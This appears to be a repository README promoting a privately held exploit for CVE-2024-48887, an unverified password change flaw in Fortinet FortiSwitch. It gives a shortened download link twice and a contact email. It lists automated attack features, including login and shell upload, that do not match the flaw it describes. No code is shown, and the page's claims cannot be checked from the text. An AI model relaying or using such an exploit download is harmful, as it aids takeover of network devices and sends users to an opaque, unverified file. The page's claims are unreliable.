Unverified Password Change (CWE-620)# CVE-2024-48887-Unverified Password Change (CWE-620)
## Overview
An unverified password change vulnerability in Fortinet FortiSwitch GUI that allows a remote unauthenticated attacker to change admin passwords via a specially crafted request
## Exploit:
## [Download here](https://tinyurl.com/rxmjnfn7)
## Details
+ **CVE ID**: CVE-2024-48887
+ **Published**: 04/08/2025
+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.8
+ **Patch Available: (No official patch yet)**
## Impact
This critical vulnerability enables an external attacker to completely compromise administrative access to Fortinet FortiSwitch devices without requiring any authentication. An attacker could: - Arbitrarily change admin passwords - Potentially gain full control of the network switch - Bypass existing security controls - Compromise network infrastructure integrity and availability
## Exploit Features
+ ✅ Automated Exploitation – Extracts nonce, logs in, and uploads the shell automatically.
+ ✅ Version Check – Confirms if the target is vulnerable before exploitation.
+ ✅ Error Handling – Ensures smooth execution even in case of failures.
+ ✅ Session Handling – Uses persistent session management for authentication.
+ ✅ Real-time Feedback – Provides output at each step.
## Contact
+ **For inquiries, please contact:*nowkie221@outlook.com*
+ **Exploit** :[Download here](https://tinyurl.com/rxmjnfn7)
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view